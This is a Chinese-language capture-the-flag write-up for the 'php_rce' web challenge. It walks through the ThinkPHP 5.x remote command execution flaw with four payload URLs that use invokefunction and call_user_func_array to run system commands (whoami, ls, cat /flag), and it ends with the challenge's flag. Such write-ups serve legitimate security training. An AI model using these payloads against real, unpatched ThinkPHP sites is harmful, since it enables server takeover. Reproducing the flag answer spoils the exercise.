每日一題,今天我們來攻防世界web篇(php_rce)
目錄
1、利用system函數(shù)遠(yuǎn)程命令執(zhí)行
2、查找文件目錄
3、進(jìn)入flag目錄
4、查看flag文件拿到flag
首先打開題目:
?這里我們可以看到打開后是一個ThinkPHP V5的界面,由此我們可以判斷這是一個使用TinkPHP框架開發(fā)的,接下來我們由長期的滲透經(jīng)驗(yàn)可以想多去網(wǎng)上找相關(guān)的漏洞來復(fù)現(xiàn)
這里時使用了ThinkPHP 5.x 遠(yuǎn)程命令執(zhí)行漏洞
1、利用system函數(shù)遠(yuǎn)程命令執(zhí)行
構(gòu)造payload
index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
2、查找文件目錄
構(gòu)造payload
index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls /
?可以看到有很多目錄我要找flag接下就這就進(jìn)flag去
3、進(jìn)入flag目錄
構(gòu)造payload
index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls /flag
?有兩個flag文件這里我們直接使用 cat 命令來打開文件
4、查看flag文件拿到flag
構(gòu)造payload
index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat
/flag
文章來源:http://www.zghlxwxcb.cn/news/detail-609467.html
flag{thinkphp5_rce}?文章來源地址http://www.zghlxwxcb.cn/news/detail-609467.html
到了這里,關(guān)于攻防世界-web篇(php_rce)詳解的文章就介紹完了。如果您還想了解更多內(nèi)容,請?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!